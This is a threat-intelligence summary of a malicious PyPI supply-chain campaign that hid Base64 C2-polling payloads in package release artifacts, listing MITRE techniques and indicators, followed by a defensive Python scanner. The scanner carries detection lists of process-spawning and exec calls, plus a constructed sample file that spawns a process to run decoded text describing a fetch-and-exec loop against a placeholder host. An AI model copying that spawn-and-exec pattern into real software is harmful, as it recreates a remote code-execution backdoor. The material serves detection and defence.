Key points
- ReversingLabs identified 24 malicious PyPI packages impersonating popular libraries (e.g., vConnector, eth-tester, databases).
- Malicious functionality was embedded in release artifacts (not in linked GitHub source), notably in __init__.py files containing Base64-encoded payloads.
- Decoded payloads spawn processes, build a host‑specific C2 URL (replacing “paperpin3902” with platform initial, username, and a 6‑char random string), and enter an endless fetch/execute loop for further Base64 commands.
- The C2 infrastructure included domains and an IP (e.g., ethertestnet.pro, deliworkshopexpress.xyz, 45.61.139.219) but served no observed commands during analysis, suggesting request filtering or selective targeting.
- Attackers created matching GitHub projects with benign code to misdirect reviewers and automated source scans, hiding malicious code only in the packaged release artifacts.
- Packages were removed from PyPI within days, but the adversary repeatedly posted replacements, indicating an ongoing, organized supply‑chain campaign.
MITRE Techniques
- [T1027] Obfuscated Files or Information – uses Base64 encoding to hide malicious payloads (‘Base64 encoded string’).
- [T1059] Command and Scripting Interpreter – decoded payload is executed in a spawned process (‘decoded and executed in another process’).
- [T1105] Ingress Tool Transfer – downloads additional Base64‑encoded commands from a command and control server (‘attempts to download another Base64 encoded string with additional commands’).
- [T1071] Application Layer Protocol – contacts a remote C2 server over web protocols to fetch commands (‘contacts the command and control (C2) server and attempts to download…’).
Indicators of Compromise
- [IP address] C2 server – 45.61.139.219
- [Domain] Command-and-control domains – ethertestnet.pro, deliworkshopexpress.xyz
- [PyPI package] Malicious package names/versions – VMConnect (1.1.7), ethter (1.10.1b1), and others (e.g., quantiumbase, osinfopkg)
- [File hash – SHA1] Release artifact hashes – b0095f149951241c6e11e0d1be1f74e8cdfbdbb2, d404a55f1f7fbcd8b3156a84ebcf97c57ba24b95, and 20 more hashes
ReversingLabs’ Titanium static-analysis engine flagged a suspicious VMConnect release by extracting behavior indicators from the package artifact: process creation calls, Base64 decoding, and binary-to-string conversions inside the package’s __init__.py. Manual review of that file revealed a large Base64 string which is decoded and executed in a separate process; the decoded payload contains a template C2 URL and an execution loop that repeatedly polls the C2 for further Base64-encoded commands.
The embedded logic builds a host-specific C2 endpoint by replacing the token “paperpin3902” with a string composed of the host platform’s first letter, the username, and a random six-character suffix; it then sleeps and re-polls the C2 in an endless loop, executing any received decoded instructions. Although the C2 was reachable during analysis, no follow-on commands were served—consistent with selective targeting or request filtering by the operator.
To evade detection, the adversary published corresponding GitHub repositories containing benign __init__.py code while packaging malicious variants to PyPI releases, and impersonated popular packages (copied descriptions and versioning) to increase installs. The technical takeaway: security teams must analyze final release artifacts and behavior indicators (not just repository source) to detect Base64-obfuscated payloads that spawn processes, fetch secondary content from C2s, and execute dynamically delivered code.
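One way to apply that takeaway in practice, as an added example that is not ReversingLabs' Titanium engine nor any code from the campaign: a small static scanner that parses a file taken from the release artifact (such as the package's __init__.py), records the behaviour indicators named above (process creation, Base64 decoding, bytes-to-string conversion), decodes any long Base64 string literal it finds, and screens the decoded text for fetch/exec tokens and the page's "paperpin3902" URL placeholder. The sample __init__.py and the marker text inside its blob are constructed here for the demonstration; the host name in it is a placeholder, and the marker text is deliberately not runnable code.

```python
import ast
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Behaviour indicators the page says were extracted from the package's __init__.py:
# process creation, Base64 decoding and binary-to-string conversion. Matched on the
# dotted call target as written in the source (e.g. "subprocess.Popen").
SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.popen",
    "base64.b64decode", "exec", "eval", "compile",
}

# Tokens worth flagging inside a decoded blob: network fetch, dynamic execution,
# process spawning, a polling loop, and the page's C2 URL placeholder token.
PAYLOAD_TOKENS = ("urlopen", "requests.get", "http://", "https://", "exec(", "eval(",
                  "subprocess", "os.system", "while True", "paperpin3902")

B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class Finding:
    kind: str      # "call" (suspicious API use) or "blob" (decodable Base64 with payload tokens)
    lineno: int
    detail: str


@dataclass
class Report:
    findings: List[Finding] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        kinds = {f.kind for f in self.findings}
        if "blob" in kinds:          # decodable blob carrying fetch/exec tokens: strongest signal
            return "suspicious"
        return "review" if "call" in kinds else "clean"


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'pkg.attr' for a Name/Attribute chain (e.g. subprocess.Popen), else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def decode_if_base64(text: str, min_len: int = 64) -> Optional[str]:
    """Decode `text` if it is a long, strictly valid Base64 string yielding UTF-8; else None."""
    compact = re.sub(r"\s+", "", text)
    if len(compact) < min_len or not B64_CHARS.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_source(source: str) -> Report:
    """Statically scan one Python file taken from the release artifact (not the repo)."""
    report = Report()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                report.findings.append(Finding("call", node.lineno, name))
            elif isinstance(node.func, ast.Attribute) and node.func.attr == "decode":
                report.findings.append(Finding("call", node.lineno, "<expr>.decode()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = decode_if_base64(node.value)
            if decoded is not None:
                hits = [t for t in PAYLOAD_TOKENS if t in decoded]
                if hits:
                    report.findings.append(
                        Finding("blob", node.lineno, "base64 blob decodes to text with " + ", ".join(hits)))
    return report


# --- Constructed sample input (not a real package) -------------------------------
# Marker text standing in for a decoded payload: it carries the tokens a scanner
# should react to, but is deliberately not runnable code.
PAYLOAD_TEXT = (
    "C2 = http://paperpin3902.c2.example.invalid/  # placeholder, not a real host\n"
    "while True: exec(urlopen(C2)) ... sleep ... repeat  # descriptive marker, not code\n"
)
SAMPLE_INIT = f'''import base64
import subprocess

def connect(host):
    return f"vmconnect://{{host}}"

_blob = "{base64.b64encode(PAYLOAD_TEXT.encode()).decode()}"
subprocess.Popen(["python3", "-c", base64.b64decode(_blob).decode()])
'''

SAMPLE_REPORT = scan_source(SAMPLE_INIT)

if __name__ == "__main__":
    for f in SAMPLE_REPORT.findings:
        print(f"line {f.lineno:>3}  {f.kind:<4}  {f.detail}")
    print("verdict:", SAMPLE_REPORT.verdict)
```

Run it against every .py file unpacked from the wheel or sdist rather than against the GitHub checkout, since the page's point is that the two differed. The "review" verdict (suspicious calls but no decodable blob) is intentionally weaker than "suspicious", because Base64 decoding and subprocess use are common in legitimate packages; it is the combination of a long literal that decodes to fetch/exec text with a spawned process that matches the behaviour described above.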